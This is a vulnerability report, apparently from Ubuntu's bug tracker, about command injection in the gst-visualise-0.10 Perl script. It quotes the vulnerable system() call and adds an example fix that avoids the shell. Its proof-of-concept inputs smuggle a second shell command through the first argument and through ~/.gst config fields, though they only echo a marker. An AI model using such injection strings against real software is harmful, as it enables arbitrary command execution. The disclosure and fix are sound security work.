command injection in gst-visualise-0.10

Bug #782466 reported by Emanuel Bronshtein
Affects: gst-plugins-base0.10 (Ubuntu)
Status: New
Importance: Undecided
Assigned to: Unassigned

Bug Description

Binary package hint: gstreamer0.10-plugins-base-apps

/usr/bin/gst-visualise-0.10 has a command injection bug.

Test case:
1) from first argument ($pipe variable):
emanuel@emanuel-desktop:/tmp$ gst-visualise-0.10 "text 2>/dev/null ; echo Systeminj ; #"
No configuration file /home/emanuel/.gst found. You might want to create one.
Running gst-launch-0.10 osssrc ! text 2>/dev/null ; echo Systeminj ; # ! { queue ! ffmpegcolorspace ! xvimagesink }
Systeminj

2) from ~/.gst file :
emanuel@emanuel-desktop:/tmp$ cat ~/.gst
AUDIOSRC=test;echo Systeminj;exit;
VIDEOSINK=test;echo Systeminj;exit;
CVS_PATH=test;echo Systeminj;exit;

emanuel@emanuel-desktop:/tmp$ gst-visualise-0.10
Running gst-launch-0.10 test;echo Systeminj;exit; ! goom ! { queue ! ffmpegcolorspace ! test;echo Systeminj;exit; }
Systeminj

The bug can be found at:

    $command = "gst-launch-0.10 $cfg{AUDIOSRC} ! $pipe ! { queue ! ffmpegcolorspace ! $cfg{VIDEOSINK} }";
    print "Running $command\n";
    system ("PATH=\$PATH:".$cfg{CVS_PATH}."/gstreamer/tools $command");
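One way to remove the shell from this call, shown as an added example that is not part of the original report and is not the upstream fix: the pipeline is built as an argument list and passed to list-form `system`, and PATH is extended through `%ENV`. The names `build_argv` and `run_visualise`, the whitespace-only splitting, and the `/tmp/cvs` value are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Build an argument vector instead of one shell command string.
# Values are split on whitespace only (assumption: no element property
# needs an embedded space), so ; | > # ` $ remain ordinary characters.
sub build_argv {
    my ($cfg, $pipe) = @_;
    return (
        'gst-launch-0.10',
        split(' ', $cfg->{AUDIOSRC}), '!',
        split(' ', $pipe), '!',
        '{', 'queue', '!', 'ffmpegcolorspace', '!',
        split(' ', $cfg->{VIDEOSINK}), '}',
    );
}

# Run the pipeline without /bin/sh. Returns system()'s status.
sub run_visualise {
    my ($cfg, $pipe) = @_;
    my @argv = build_argv($cfg, $pipe);
    # Extend PATH through %ENV, not through a "PATH=... cmd" shell prefix.
    local $ENV{PATH} = "$ENV{PATH}:$cfg->{CVS_PATH}/gstreamer/tools";
    print "Running @argv\n";
    # The block form forces execvp() even for a one-element list.
    my $rc = system { $argv[0] } @argv;
    warn "could not start $argv[0]: $!\n" if $rc == -1;
    return $rc;
}

# Constructed input: the first-argument string from the report's test case 1.
my %cfg  = (AUDIOSRC => 'osssrc', VIDEOSINK => 'xvimagesink', CVS_PATH => '/tmp/cvs');
my $pipe = 'text 2>/dev/null ; echo Systeminj ; #';
my @argv = build_argv(\%cfg, $pipe);

# Stand-in child (perl itself) that prints the arguments it receives, so the
# demonstration runs without GStreamer installed.
my @probe = ($^X, '-e', 'print "[$_]\n" for @ARGV', '--', @argv[1 .. $#argv]);
system { $probe[0] } @probe;
```

The stand-in child receives `;`, `echo` and `Systeminj` as separate literal arguments, because no shell parses the string before the program is executed.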
